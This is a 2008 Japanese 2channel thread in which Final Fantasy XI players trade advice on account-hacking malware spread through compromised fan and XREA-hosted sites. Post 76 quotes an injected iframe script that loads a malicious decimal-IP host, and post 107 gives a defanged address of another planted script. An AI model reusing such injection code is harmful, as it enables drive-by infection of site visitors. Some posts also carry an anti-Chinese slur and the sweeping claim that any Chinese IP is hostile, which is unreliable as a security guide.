クリーンインスコされてる方はこれといった確証はないけどしているんですかね
63 名前：既にその名前は使われています：2008/08/13(水) 23:54:27 ID:6puEHWWP: >>62
現状の危険度からすると、安　全　な　確　証　が無い限りクリーンインストールし直した方が良いんじゃないかと。
64 名前：既にその名前は使われています：2008/08/13(水) 23:56:43 ID:K9+YqjOZ: ここ踏んでしまったのですが大丈夫でしょうか？
http://coffer.hp.infoseek.co■jp/
65 名前：既にその名前は使われています：2008/08/13(水) 23:56:52 ID:dDD4V9ke: >>61
1039045744:88/jp■jsは生きてるぞ
見方が判らないとか言うなよ？
66 名前：既にその名前は使われています：2008/08/13(水) 23:57:06 ID:iMMWdqk7: ウイルススキャンは常に後手だと何度言ったら・・・
67 名前：既にその名前は使われています：2008/08/13(水) 23:58:45 ID:hDANwYFp: >>65
ありがとうございます、見てきます
68 名前：既にその名前は使われています：2008/08/14(木) 00:00:00 ID:K3CECdBf: >>64
ネットワーク板
http://pc11.2ch.net/hack/
勇気がなくて踏めない人のための鑑定ｽﾚPart18
http://pc11.2ch.net/test/read.cgi/hack/1208760889/
69 名前：既にその名前は使われています：2008/08/14(木) 00:02:41 ID:aMNS/R4r: 垢ハク犯人は装備の売却に常時とんずらやワープツールを使っている。
このようなツールは鯖のツール判定プログラムで自動的にピックアップ
されるから、ハクられた垢はほぼ傷垢(ペナルティポイント加算)になってる。
他人に履かれたフンドシで相撲を取るなんて考えれられん。解約するは・・・
70 名前：既にその名前は使われています：2008/08/14(木) 00:29:56 ID:YzENHiPb: 他人の履いたブルマだと考えるんだ
71 名前：既にその名前は使われています：2008/08/14(木) 00:35:53 ID:A+IAEUkE: 男が履いたブルマかYO！
72 名前：既にその名前は使われています：2008/08/14(木) 00:39:58 ID:YzENHiPb: そこは妄想でカバーだ!
73 名前：既にその名前は使われています：2008/08/14(木) 00:45:15 ID:GeNlfYze: 見てきたスクリプト、ここに出したらいけないですよね
見られれば、たとえばチェッカーで見たときスクリプトがわからない人でも
参考にできると思うですけど
74 名前：既にその名前は使われています：2008/08/14(木) 00:47:12 ID:JQYbzxaC: 参考になるから支障のない範囲でお願い

で、なんか垢ハック犯人らしいが詳しくは不明
http://changi.2ch.net/test/read.cgi/ogame/1218036781/l50#tag103
75 名前：既にその名前は使われています：2008/08/14(木) 00:56:24 ID:IOKTBHql: スレ違かもなんですが、カスペとかPG2入れてると、FFXIログインしてる時に
しばらく未入力だとPCがフリーズするとかそういう不具合とかありますかね？
76 名前：既にその名前は使われています：2008/08/14(木) 01:00:04 ID:GeNlfYze: では、コアだと思われる部分だけ

罠スクリプト↓
document.write("<iframe src=http:\/\/1039045744:88 width=100 height=0><\/iframe>");
77 名前：既にその名前は使われています：2008/08/14(木) 01:00:33 ID:YzENHiPb: >>73
無くてもいいよ。無用な混乱を招く。

>>74
LSでIDとパス教えててパクって鯖移転のそれ飽きた。
78 名前：既にその名前は使われています：2008/08/14(木) 01:02:49 ID:YzENHiPb: >>75
別な要因かと。省電力でコケたとか熱暴走とか。
79 名前：既にその名前は使われています：2008/08/14(木) 01:04:23 ID:GeNlfYze: >>77
ごめんなさい、ちょっと前後で書いちゃいましたm(_ _)m
80 名前：既にその名前は使われています：2008/08/14(木) 01:07:36 ID:IOKTBHql: >>78
うーん、今までそういうの無かったんですけどね～
キャラ動かしてたり何かしら入力してると何時間でも問題ないんですが、
全く入力してないで放置してると1時間くらいかなぁ　でフリーズしてて
PCの電源落とすしかなくなるんですよ。
なんだかなぁ；
81 名前：既にその名前は使われています：2008/08/14(木) 01:10:24 ID:vAFpXIit: 大丈夫だと思うけどエレメンも当分見れんな
82 名前：既にその名前は使われています：2008/08/14(木) 01:11:47 ID:9n56YTji: miku.xrea.jpにアクセスすると
53.139.29.106に接続していますとステータスバーに表示され、
ブラウザが更新され続けるのですが、
これもウィルスに関する挙動でしょうか？
83 名前：既にその名前は使われています：2008/08/14(木) 01:23:49 ID:GeNlfYze: >>82
わたしもそれになって自前のソフトとカスペルスキーのオンラインスキャンをして
みましたけど、とりあえずウィルスはいませんでした
まぁ、wreaが危ないといっても、xreaそのものにウィルスがいるわけではないので
気になったらスキャンしてください
あと、FF11Warningさんとこはミラーサイトがありますから、こちらに↓

FF11Warningさんとこのミラーサイト = ttp://www.geocities.jp/ff11warning/
84 名前：既にその名前は使われています：2008/08/14(木) 01:28:08 ID:tol5S0KS: >75
ＡＳＵＳなんかの自作ＰＣなら
温度モニタソフト入れてたら要注意

原因が判明するまで何回フリーズしたやら＿|￣|○
85 名前：既にその名前は使われています：2008/08/14(木) 01:29:55 ID:GDhlN80S: 垢ハック多いと言うコトでカスペルスキーでオンラインスキャンしたら
P2P-Worm.Win32.spy Bot.gl ってのが見つかったんですが
コレって垢ハックのウィルスですか？PC素人なのでよくわかりません。
ご教授宜しくお願いします
86 名前：既にその名前は使われています：2008/08/14(木) 01:30:47 ID:vlbi0W4q: 先週末に垢ハックにあい、ウイルス対策をしているのですが
ウイルスバスターの全検索、Kasperskyの重要部分＆メモリは特に問題はないのですが
なぜかPC起動時に毎回以下のアクセスログがでます(まとめて6回ほど)
Range:Hong-Kong
Destination:61.238.148.112
Protocol:ICMP
Action:Blocked

ブロックされているのでいいといえばいいのですが、
他にも不正通信されていないか心配です。
ちなみにICMPなのでPINGへの応答かと思いネットワーク切断して
起動してみましたが同じでした。
これはウイルスでしょうか？またよい対策はありますでしょうか？
87 名前：既にその名前は使われています：2008/08/14(木) 01:31:47 ID:p8SK/0L4: >>85
ＦＦとは関係ない。クレカの番号とかぱくるやつだな
88 名前：既にその名前は使われています：2008/08/14(木) 01:33:27 ID:iIdWbJKU: >>86
まずIPでぐぐれ
それガチでウイルスのあるURLだよ
ブラウザ開く前からそこに繋ごうとしてるならまだどこか感染してるんじゃないかな
89 名前：既にその名前は使われています：2008/08/14(木) 01:34:09 ID:EVITxU2z: >>85
もっと怖いやつみたいだな　ご愁傷様
90 名前：既にその名前は使われています：2008/08/14(木) 01:35:32 ID:cf9VZbXa: >>86
困ったときはクリーンインストールだ
91 名前：既にその名前は使われています：2008/08/14(木) 01:37:26 ID:LxIClmK2: >>86
>先週末に垢ハックにあい、ウイルス対策をしているのですが

クリリンしたのかね？どうせしないで見つかったウイルス削ったから安心＾＾とか思ってるんだろ？
甘すぎますよ奥さん
92 名前：既にその名前は使われています：2008/08/14(木) 01:40:42 ID:GDhlN80S: 85です。返事ありがとうございました。
もっと怖いヤツだったのですか～・・・
カスペルスキーで赤字＞緑字になって脅威はありませんと出たのですが
コレで安心なのでしょうか？質問ばっかりですみません
ご教授おねがいします。
93 名前：既にその名前は使われています：2008/08/14(木) 01:41:12 ID:IOKTBHql: >>84
PCはおんぼろDELLなんですけどね～
ただHD新しくしてセキュリティ対策したので、グラボのドライバが
古いまんまなんですが、それは関係ありますかね？
94 名前：既にその名前は使われています：2008/08/14(木) 01:43:00 ID:LxIClmK2: >>92
アンチウイルスは定義したもの意外のウイルスを基本的に探すことは出来ません。
貴方のPCが安全かは誰にもわかりませんし、誰も安全だとは言わないでしょう
95 名前：既にその名前は使われています：2008/08/14(木) 01:43:08 ID:GeNlfYze: http://changi.2ch.net/test/read.cgi/ogame/1218036781/l50#tag103

↑こっちのほうは単にリアルで知り合ったPCのパスを使ってアイテムを取り逃げしただけの
ことらしいですから、業者のアカウントハックとはぜんぜん別問題みたいですね
96 名前：既にその名前は使われています：2008/08/14(木) 01:43:47 ID:EVITxU2z: >>92
削除されたならおｋだろうけどさ
すぐカード番号かえたほうがいいんじゃねーの？
97 名前：既にその名前は使われています：2008/08/14(木) 01:45:28 ID:aiXUw+5I: >>80
カバー外して扇風機吹きかけてゲームしながら様子見てみ？
ケースによっては熱が逃げずにこもりまくって暴走するから。

メーカー製やBTOとかだと特にね。
98 名前：既にその名前は使われています：2008/08/14(木) 01:48:40 ID:vlbi0W4q: >>88
IPはモロに危険っぽいですよね。
ブラウザ開く前ですが、スタートアップに少しアプリが入っていたので
それを削除してからもう一回試してみます。

>>90
いろいろPC環境整えてあるのでクリーンインストールは避けたかったのですが、、
とりあえずFF復帰までは1ヶ月近くあるっぽいのでいろいろ検討してみます。

>>91
安心はしてないですがクリリンのことは最終手段としていました。
でも今の不安状態で生活するよりはまっさらにしたほうが良いかもしれませんね。

ご教授ありがとうございました
99 名前：既にその名前は使われています：2008/08/14(木) 01:48:49 ID:IOKTBHql: >>97
なるほど。試してみます。
ありがとうです～
100 名前：既にその名前は使われています：2008/08/14(木) 01:50:08 ID:p8SK/0L4: >>85

P2P-Worm.Win32.spy Bot.gl

-- このマルウェアは以下の情報を収集し送る能力があります：
. キャッシュに入ったパスワード
. CPU速度
. ログインしているユーザ
. 空きメモリ
. マルウェアの起動時間
. プラットフォームID
. 起動中のプロセスについての情報
. メモリサイズ
. ウインドウズ・ディレクトリ
. ウインドウズOSについての情報
101 名前：既にその名前は使われています：2008/08/14(木) 01:50:33 ID:p8SK/0L4: -- その他以下のアクションを実行することもできます：
. IRCサーバと接続します。
. DDoS SYN flood 攻撃を開始します。
. IRCサーバとの接続を終了します。
. ダウンロード・ファイル
. 実行ファイル
. IRCチャンネルに入室する
. プロセスを強制終了する
. IRCチャンネルを退室する
. リモートシェルを開く
. ネットワーク・スキャンの実行
. ポート転送を実行する
. システム再起動
. キーログの開始　　　　　　　　　　←キーロガー
. マルウェアを終了する
. プロセスを終了する

http://www.avira.com/jp/threats/section/fulldetails/id_vir/2235/worm_spybot.gl.315.html
102 名前：既にその名前は使われています：2008/08/14(木) 01:52:59 ID:H0UdjKQk: P2Pなんてするから・・・
103 名前：既にその名前は使われています：2008/08/14(木) 01:56:21 ID:GeNlfYze: 書かなくてもいいことかもですけど

Range:Hong-Kong
Destination:61.238.148.112

これ、wrea改竄で飛ばされるところのIPです
104 名前：既にその名前は使われています：2008/08/14(木) 01:58:08 ID:H0UdjKQk: 香港の警察に中国語で通報してみて
香港なら英語でも通じるか
105 名前：103：2008/08/14(木) 01:58:20 ID:GeNlfYze: 落ち着け＞わたし

wrea　×
xrea　○
106 名前：既にその名前は使われています：2008/08/14(木) 01:59:13 ID:1gwjXYqU: ＞いろいろPC環境整えてあるのでクリーンインストールは避けたかったのですが

…マルウェア発見しても”完治”する気がない、こういう脳天気な人にあれこれ言っても無駄な気がする……
垢抜かれて一度ひどい目にあわないと本気にならないんじゃない？
107 名前：既にその名前は使われています：2008/08/14(木) 01:59:13 ID:aklN3wiM: >>60
Final Fantasy XI Web Portalさんのところに仕込まれていたスクリプトのアドレスは、これでした。
www●1ive●net■images■banner.jpg
（●を.に、■を/に変換してください)
ソースチェッカーで見ると、スクリプトが吐かれて来ます。
108 名前：既にその名前は使われています：2008/08/14(木) 01:59:21 ID:YzENHiPb: >>103
君はxreaをwreaと打つ性癖を直したほうがいい
109 名前：既にその名前は使われています：2008/08/14(木) 02:10:41 ID:YzENHiPb: >>107
XREA改ざんとは別な奴だね。
今いじり中。
110 名前：既にその名前は使われています：2008/08/14(木) 02:18:57 ID:YzENHiPb: >>107
検体拾えた。
polcoreの文字列が見えるからたぶんFFのアカハック。
system32\disk.dll
system32\msni.exe
これがあったら感染。
111 名前：既にその名前は使われています：2008/08/14(木) 02:43:26 ID:YzENHiPb: NortonとバスターとBitDefender以外はだいたい検知可能。
ttp://www.virustotal.com/analisis/c0526dddbb0826ce02ea524874b9bb90
ソースネクストですらも(駆除できるかどうかは知らない)。
スカった主なベンダには送付済み。
112 名前：既にその名前は使われています：2008/08/14(木) 02:48:14 ID:LxIClmK2: 検体提出乙

しかし、亜種が半端ない速度で出るな
被害は減りそうに無いな
113 名前：既にその名前は使われています：2008/08/14(木) 02:51:46 ID:YzENHiPb: 1iveは前からマークしてたのよね。ダウンローダが頻繁に更新されるんで。
XREA食った奴はサイトは1つ(fccja)だけどやる事はすごい。
ただ圧倒的に多いのは、やることはもっとずっとショボいけど
その代わりものすごい数のドメインを取り続ける奴。1iveは後者。
114 名前：既にその名前は使われています：2008/08/14(木) 04:11:58 ID:IS46vyYb: ウイルスひっかかったらクリーンインストールは最終手段じゃなくて比較的初期にやる
ものだよ。
115 名前：既にその名前は使われています：2008/08/14(木) 04:15:01 ID:jMGq0IPe: どんだけネ実脳だ
さすがFF専用機所持率No.1板だｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
116 名前：既にその名前は使われています：2008/08/14(木) 06:53:34 ID:zQGTa+ds: パス抜き祭り下火になってきたんぁもっと盛り上がればいいのにｗ
117 名前：既にその名前は使われています：2008/08/14(木) 06:53:54 ID:WAx7BW0K: >>
最後の砦だよな、一日４万ぐらいアクセスあるんだろ。
へたすりゃサービス終了なりかねん；；
118 名前：既にその名前は使われています：2008/08/14(木) 07:09:03 ID:CZdM2WB1: PCをクリーンインストールしたからノートン入れなおしたんだけど、インスコ許容台数超えたから
シマンテックのサポセンに電話してロックを解除して貰ったんだわ。
2回電話して別の受付の人にそれぞれ対応してもらったんだけど2回とも中国人だったんだよねー。
ノートンのウィルス対応が遅いのはまさか内部に・・・まさか・・・な
119 名前：既にその名前は使われています：2008/08/14(木) 07:47:16 ID:2oBeZiwE: シマンテックのサポセンは日本語が通じないときがある
マジで
120 名前：既にその名前は使われています：2008/08/14(木) 08:55:16 ID:ubcX74yi: 日本語通じないだけなら、まあ担当かえさせるとか手はあるんだが、
日本の常識が通じなくてマニュアル的にできませんとか言われると、
取り付く島が無くて困ってしまう。

なので、サポート使いそうなソフトやＰＣ本体なんかは、サポートの良いとこってのが選ぶ第一条件になるなー
電話のつながりやすさも同じくらい重要かな。
自力で問題ないものはどうでもいいけど。
121 名前：既にその名前は使われています：2008/08/14(木) 09:01:29 ID:a85ZncdE: さっき手動でwindowsupdateしようとしたらweb上のエラーがどうのこうのって出てできなくて
もっかいやっても同じで
更にやったらできたんだけど
どうやら自動更新の察知と同時にやっちゃったせいでエラーになったようだ、一瞬焦ったｗ
122 名前：既にその名前は使われています：2008/08/14(木) 09:31:51 ID:lFJerQM/: うへ
SPYBOTを1.60にしたら動作が不安定になった
123 名前：既にその名前は使われています：2008/08/14(木) 09:36:30 ID:gGZVjC5K: >>82 >>83
miku.xrea.jpは　s350というサーバに設置していて
IPはそのサーバのIP53.139.29.106に設定されてます。
xrea.jpは　無料で使えるサブドメインなので～xrea.jp　というサイトのIPはバラバラになります。
参照：ttp://www.value-domain.com/svip.php?action=all#bottom

アクセス許可を　ブラウザの言語設定で
日本語がある○
中国語　ロシア語がある×としているので
日本語があって　中国語かロシア語もあるとループしてしまってるかもです　すみません。
帰省中のため戻りましたら確認してまた報告させていただきます。
手短ですみません。
124 名前：既にその名前は使われています：2008/08/14(木) 09:39:08 ID:/VEQf9Sp: シマンテックのサポートはチャットにしておけ。
コピペとかできるから電話よりは遙かにまし。

しかし、あの会社は返金可能とかを謳い文句にしてるけど、海外取引必須とか理解できない。
自作機と相性悪くて、何故かインストール後３日で起動しなくなる不具合があってどうあっても直らず・・・
そんな動かないもの持っててもしょうがないから返金して貰おうと思ったけど、手続きが面倒すぎて諦めたし。
125 名前：既にその名前は使われています：2008/08/14(木) 10:05:02 ID:0ls6wOvV: ttp://www.playonline.com/support/search/痴女子校生
126 名前：既にその名前は使われています：2008/08/14(木) 10:42:09 ID:71MRUmDe: 初心者ですみません。
マイクロソフトのアップデートは自動更新が有効になっていたのですが、
先ほどマイクロソフトのHPに行ってみて確認したところ、16個もインストールされていないもの？がありました。
これはこちらのPCの問題なのでしょうかか、ウイルスなのでしょうか
127 名前：既にその名前は使われています：2008/08/14(木) 10:45:40 ID:Thw5puhu: 昨日、大量にアップデートがあったから。
128 名前：既にその名前は使われています：2008/08/14(木) 10:47:15 ID:71MRUmDe: >>127
そうだったんですか！だとしたら今日の自動更新の時間に更新されることになってたのかもしれませんね
ありがとうございました。
129 名前：既にその名前は使われています：2008/08/14(木) 10:48:27 ID:Thw5puhu: 自動更新は、カスタムインストールの方のアップデートや追加がされないしね。

定期的に手動でアップデートしないとダメ。
130 名前：既にその名前は使われています：2008/08/14(木) 10:54:03 ID:kbR5x+m6: >>126
定例だから安心汁
131 名前：既にその名前は使われています：2008/08/14(木) 11:33:39 ID:YzENHiPb: >>126
というかそういうのは
http://pc11.2ch.net/pcqa/
132 名前：既にその名前は使われています：2008/08/14(木) 12:17:47 ID:HO31Cm+w: すみません、テンプレのFWの設定で悩んでいるので教えてください。
カスペルスキーを使っています。

ファイアウォール、アプリケーションのルール→pol.exeで
１．新しいアプリケーションのルール
　内容はUDPで許可、テンプレのリモートIPアドレスの範囲、リモートポートの範囲を設定
２．新しいアプリケーションのルール
　内容は1と同じだけれどTCP
３．Block Any TCP Activity
　　すべてのTPC接続を遮断
４．Block Any UDP Activity
　　すべてのUDP接続を遮断

にしています。確か１・２の設定の上に、すべてを遮断にしないといけないとどこかに書いてあった気がしたので
今まで１と２だけにしていたので、３と４を追加したのですが、そうするとPOLに接続できなくなりました、、
優先順位は上から順番とか書いてあった気がするのですが、この設定ではだめなのでしょうか、、、
教えてください。
133 名前：既にその名前は使われています：2008/08/14(木) 12:29:33 ID:BdHDMfA1: ３と４は不要
134 名前：既にその名前は使われています：2008/08/14(木) 12:36:15 ID:cILPiNG6: ここの常連さんのほとんどはPG2を使ってると思うので
ちょっとお尋ねしたいんですが…

PG2を入れてみたところ、毎日24:00前後に必ず１回、FFが
全画面モードを失いましたエラーになって落ちるんです。
2アカ使いなんですがPC2台とも同様の症状が出てます。

PG2の設定にある自動更新の類は全部チェックOFFにしたんですが、
それでも状況は変わらずで、PG2を起動しないようにしたら改善
されたので原因はPG2で間違いないと思うんですが。

ぐぐってみたらこのスレの過去ログ(17,18)あたりで同じような
人がいたらしいんですが、改善策は出てなかったのでとりあえず
書き込ませてもらいました。
どなたか同様の現象がおきてるとか、改善策をご存知の方とか
いらっしゃいませんか？
135 名前：既にその名前は使われています：2008/08/14(木) 12:43:00 ID:rNsAdinb: >>134
別のアンチウィルスソフトの自動更新が24:00に走ってるとか？
136 名前：既にその名前は使われています：2008/08/14(木) 12:43:57 ID:HO31Cm+w: >>133
やっぱりそうなんですか。ありがとうございます。１と２だけにしときます。
137 名前：134：2008/08/14(木) 12:50:16 ID:cILPiNG6: >>135さん
アンチウィルスソフトはavast!を使っています。
一応他の常駐も疑ってみたのですが、明らかな状況として
・PG2を使っていた期間（1週間）は必ず毎日落ちていた
・PG2を使っていない期間（その後1ヶ月ほど）は全く落ちていない
なのでPG2を疑っている次第です…。
138 名前：既にその名前は使われています：2008/08/14(木) 12:51:21 ID:ZEZoRNG/: >>132
カスペルさんはよくわかんないんだけど、アプリケーションルールは基本上から下に順に処理されていくのねー。
で、Allowルールの下にAll Denyつっこんでおけばーってのは、
どうせPOLはこれ以外の接続しないわけだからAllowした以外の接続は全部ブロックしちゃっていいよねーってことなのね。
別に無くても、変なところに繋ぎ行こうとした時点でこの接続なあに？って聞いてくるだろうから特段無くても構わないと思うけど、
勢い余って許可したら目もあてらんないし、ログ記述だけしてAll Denyしちゃってたほうが安全だし楽じゃないかねｗ
139 名前：既にその名前は使われています：2008/08/14(木) 12:57:43 ID:S2b09amC: そろそろまたルーターのIPブロックリスト更新しないとか・・・
めんどくせえけどそうも言ってられないし。
FWにJAVA、ActiveXブロック機能があるけど、
そんなもの使ったら問答無用でブロックされちまうからなあ。
シナチクどもめ！
140 名前：既にその名前は使われています：2008/08/14(木) 13:05:36 ID:rNsAdinb: >>137
ttp://blog.livedoor.jp/syuta3/archives/52000224.html
この人と同じ様な状況なのかも
141 名前：既にその名前は使われています：2008/08/14(木) 13:12:08 ID:BdHDMfA1: 一応説明下手だけど補足
All DenyのルールはルーターやPGでホワイトリスト方式にする為のルール
通常１つのルール内に混ぜるような設定はしないと思う。
142 名前：既にその名前は使われています：2008/08/14(木) 13:24:15 ID:ic2zcj6r: >>134
PGの通知イベントでアイコンが点滅して落ちてるのでは？
もしそうなら、PGの履歴表示でその時間に何かブロックしてないか見てみて。
143 名前：既にその名前は使われています：2008/08/14(木) 13:41:57 ID:1m3xC/bN: 自分もAvast!とPG2使ってますが、そんな症状は出ないですけどねえ・・・
144 名前：134：2008/08/14(木) 13:53:40 ID:cILPiNG6: やっぱりどの環境でも起きることじゃないんでしょうね…
実際毎日1回エラーになるなら、絶対に、設定の注意事項とかでテンプレに載るでしょうしね。

>>140さん
紹介先見てみました。ログイン前の更新チェックを、
落ちても構わないような日に一度試してみます。

>>142さん
通知はOFFにしてあるのと、確かブロックのログには何もなかったと
記憶しています。次に再現したらログも確認するようにしてみます。
145 名前：既にその名前は使われています：2008/08/14(木) 13:57:57 ID:17i0qIa5: PGが222.186.190.14というIPからアクセス受けてるのですが垢ハックですか？助けて！”
146 名前：既にその名前は使われています：2008/08/14(木) 13:58:51 ID:dY4BwIiF: >>134さん
アンチウィルスソフトのポップアップとかで
全画面モードが落ちることがあったので、ポップアップしないように設定したら
落ちなくなった経験があります。

0:00にチャットソフト等やPGがログを整理する際に負荷がかかって落ちてる可能性も
147 名前：既にその名前は使われています：2008/08/14(木) 14:08:04 ID:OLqMI82O: fc2/xreaはもうだめだな
148 名前：既にその名前は使われています：2008/08/14(木) 14:08:13 ID:3p03O0L8: >>145
アクセスを受けているのではなく、あなたのPCが中国IPにアクセスしようと
しているわけですが、単に中国IPを弾いているからといって、それがすぐに
ハックだとは言えません
なにをどうしたら中国IPを弾くようになったのか、その説明がないと
なにもわからないです
149 名前：既にその名前は使われています：2008/08/14(木) 14:17:55 ID:Q10CGSHW: 中国ＩＰはハック、ウイルスと決めつけでいいよ
150 名前：既にその名前は使われています：2008/08/14(木) 14:19:30 ID:S2b09amC: >>145
使い方も何が起きているかもわからないのにPG2なんか入れるな
151 名前：既にその名前は使われています：2008/08/14(木) 14:27:27 ID:EnO+gkIF: だからさ、説明書読まない>>145にはこれでいいじゃん。
｢窓からPCを投げ捨てろ！｣
152 名前：既にその名前は使われています：2008/08/14(木) 14:28:59 ID:3rwK/bHo: >>145
それカスペルの自動更新ｗ
前スレにもちょこっとあったｗ

まあ、これから勉強すればいいやんｗ
153 名前：既にその名前は使われています：2008/08/14(木) 14:31:47 ID:3p03O0L8: PlanetLabでしょうかね～
PG2自身の更新でも中国IPにアクセスにいくことあるし
154 名前：既にその名前は使われています：2008/08/14(木) 14:32:47 ID:LxIClmK2: >>126といい>>145と良いPCで金銭にかかわることしちゃいけないレベルだな

余りにひどすぐる・・・
155 名前：既にその名前は使われています：2008/08/14(木) 14:48:06 ID:meMultHp: PC詳しい奴からしたら酷すぎでも、
小学生からじーさんばーさんまで含めると
これが一般的な認識。
156 名前：既にその名前は使われています：2008/08/14(木) 14:55:05 ID:O0KEO3tj: ネ実ごときで上から目線はひどいｗｗｗｗｗｗｗｗｗｗｗ
157 名前：既にその名前は使われています：2008/08/14(木) 15:07:21 ID:P9H0WAMK: もっともっとハックされればいいのに（　^ω^）
158 名前：既にその名前は使われています：2008/08/14(木) 15:24:36 ID:BdHDMfA1: 気になるアドレスやURLはaguse.jpでチェックってテンプレにもあるんだけど～
159 名前：既にその名前は使われています：2008/08/14(木) 15:35:57 ID:S2b09amC: 嫌ならPS2か箱○にすればいいだけのこと
文句を言う前に自力で何とかできないなら窓からPC投げ捨てろ
160 名前：既にその名前は使われています：2008/08/14(木) 16:02:08 ID:YEGO7nH6: >>145

まぁカスペの自動更新の中国のサーバです。

ググればすぐわかりましたよっと。
161 名前：既にその名前は使われています：2008/08/14(木) 16:02:53 ID:pKoEMTwb: まあテンプレ嫁ってことで>>1とだけ返してやろうぜｗ
162 名前：既にその名前は使われています：2008/08/14(木) 17:37:36 ID:zQGTa+ds: またギルの販売レートさがってるねｗまたバブル到来か？ｗｗｗ
163 名前：既にその名前は使われています：2008/08/14(木) 17:40:37 ID:+FsTr1Wx: Trojan-GameThief.Win32.WOW.bkf ってハックウィルスですよね？
Program Files\Trend Micro\Virus Buster 2006\Quarantine\F.tmp
が感染してました。
164 名前：既にその名前は使われています：2008/08/14(木) 17:42:05 ID:QVTR9/G5: >>162
マジッスか？今の内に買い込んでバブル来たら売り払うか・・・
てか垢ハック被害者で泣き寝入りしちゃったのが大量に出てきたのかもね。

それか垢ハック→巻き戻し→垢売りで在庫増えて業者の嬉しい悲鳴、とか？
165 名前：既にその名前は使われています：2008/08/14(木) 17:43:01 ID:Tpki0tts: >>163
なんでサポートの終わってるウイルスバスター2006を未だに使ってるの?
166 名前：既にその名前は使われています：2008/08/14(木) 17:47:09 ID:3p03O0L8: >>165
まだ2年ですけど、トレンドマイクロってそんなにすぐ
サポート打ち切っちゃうんですか？
167 名前：既にその名前は使われています：2008/08/14(木) 17:49:33 ID:sX02ZuUp: 2年もすりゃ打ち切るわ

さっさと最新版のバスター2008に変えなさい
168 名前：既にその名前は使われています：2008/08/14(木) 17:49:53 ID:sX02ZuUp: あ　言い忘れたけど無料だからね
169 名前：既にその名前は使われています：2008/08/14(木) 17:50:00 ID:n25JogCQ: こりゃたまげた
170 名前：既にその名前は使われています：2008/08/14(木) 17:55:53 ID:Tpki0tts: ( ﾟдﾟ)ﾎﾟｶｰﾝ
http://jp.trendmicro.com/jp/support/personal/end_support/

っていうかちゃんと毎年ウイルスバスタークラブ会員契約更新してるよね？
171 名前：既にその名前は使われています：2008/08/14(木) 18:02:47 ID:gRSV5OnP: ログインパスワードを暗号化しないで送るスクエニってやっぱり馬鹿なの？
172 名前：既にその名前は使われています：2008/08/14(木) 18:09:47 ID:pKoEMTwb: 釣り針が付いて無いですよ？
173 名前：既にその名前は使われています：2008/08/14(木) 18:29:53 ID:AGhB/7H2: fc2とxreaが使ってるip分かる人いる？
完全に弾いてしまいたい
174 名前：既にその名前は使われています：2008/08/14(木) 18:46:31 ID:ndDls7Fp: >>166
ウィルスバスターは最新版と１つ前以外はサポート対象外だけど
更新料金さえ払ってればソフトのVUP自体は無料
175 名前：既にその名前は使われています：2008/08/14(木) 18:47:51 ID:qL6C+BGT: カスペのおじさん、今までは完全スキャンする時にレベルを高にしただけでやってたんだが、
今日ヒューリスティックアナライザの設定で「拡張ルートキットスキャン」にチェック入れて
完全スキャンしたら復元ポイントに残ってたTrojan-GameThief.Win32.WOW.bkfが出てきた

Web専用機だったから良かったようなものの・・・
176 名前：既にその名前は使われています：2008/08/14(木) 18:49:37 ID:LxIClmK2: Quarantineには誰も突っ込まないのか
177 名前：既にその名前は使われています：2008/08/14(木) 19:14:45 ID:W2qRgPSX: FF11MAPサイトを該当日に踏んでしまったので、OS入れなおししよーかと思って
今バックアップとか、色々準備してる最中なんですが、マクロ作り直すのが毎回
すっごく面倒で、、、FF11のuserフォルダ内をｸﾘｰﾝｲﾝｽｺしたPCに入れるのは危ないですかね？
178 名前：既にその名前は使われています：2008/08/14(木) 19:18:16 ID:meMultHp: マクロってサーバー側に保存できるようになったんじゃなかったっけ？
勘違いならごめんなさい。
179 名前：既にその名前は使われています：2008/08/14(木) 19:18:39 ID:rNsAdinb: >177
サーバ保存マジおすすめ
http://wiki.ffo.jp/html/3363.html
180 名前：既にその名前は使われています：2008/08/14(木) 19:36:36 ID:W2qRgPSX: あれ、なんか軽く調べたら、OS入れなおしたらサーバー保存が消えるとかって
感じで捕らえてたんですが、勘違いかorz

ならマクロに関してはそっちで検討してみます。
181 名前：既にその名前は使われています：2008/08/14(木) 19:45:40 ID:BdHDMfA1: アルタナ導入直前VUにてサーバー保存可能になったが
若干失敗する例が報告されている。
USERフォルダのみコピーでもいいかも
もちろんウイルスチェックは必要
182 名前：既にその名前は使われています：2008/08/14(木) 19:48:01 ID:qL6C+BGT: 検体をカスペルさんに見てもらうときにDLしてきたZipファイルの中身だった、お恥ずかしい
183 名前：既にその名前は使われています：2008/08/14(木) 20:12:49 ID:vAFpXIit: XREAの件はお盆休みが終わるまで直る見込みがなさそう？
184 名前：既にその名前は使われています：2008/08/14(木) 20:19:52 ID:S2b09amC: >>183
なにをもって直ると思ってる？
前回から短期間でルート取られてるだろみたいな状況で
185 名前：既にその名前は使われています：2008/08/14(木) 20:49:02 ID:xxznc/dA: >>173
737 名前：（○口○*）さん[sage] 投稿日：08/08/12 23:47 ID:eVhkSLDc0
a. [JPNICハンドル] KH5915JP
g. [Organization] DIGIROCK,INC.
[最終更新] 2007/02/22 03:20:06(JST)
db-staff@nic.ad.jp
[参照] NET/59.139.29.96/27
[参照] NET/59.139.29.224/27
[参照] NET/60.32.200.64/27
[参照] NET/60.32.201.96/27
[参照] NET/125.53.24.64/27
[参照] NET/125.53.24.128/27
[参照] NET/125.53.25.0/27
[参照] NET/125.53.25.32/27
[参照] NET/125.53.25.224/27
[参照] NET/125.53.26.0/27
[参照] NET/202.229.187.24/30
[参照] NET/210.153.88.112/30
[参照] NET/210.172.108.224/27
186 名前：既にその名前は使われています：2008/08/14(木) 20:49:37 ID:xxznc/dA: [参照] NET/210.196.169.192/27
[参照] NET/210.196.173.48/28
[参照] NET/210.196.176.176/28
[参照] NET/210.251.253.224/27
[参照] NET/218.216.67.32/27
[参照] NET/219.101.229.128/26
[参照] NET/219.163.5.176/28
[参照] NET/219.163.200.64/26
[参照] NET/221.186.251.64/26
[参照] NET/222.227.75.0/27
[参照] NET/222.227.75.32/27
[参照] NET/222.227.75.96/27
[参照] NET/222.227.75.128/27
187 名前：既にその名前は使われています：2008/08/14(木) 20:57:57 ID:ZFyQRSJk: 【国際】米国：高学歴高収入の人ほど検索エンジンを良く使う…米シンクタンク調査
http://mamono.2ch.net/test/read.cgi/newsplus/1218459871/

自分で調べるってのは習慣化されてるんかねー
>>126と>>145とあたりをみてるといろいろ考えさせられるな
188 名前：既にその名前は使われています：2008/08/14(木) 20:59:11 ID:xxznc/dA: >Search ARIN WHOIS for: ! NET-64-125-250-0-1
CustName: FC2.com
Address: 818 W. 7th Street
City: Los Angeles
StateProv: CA
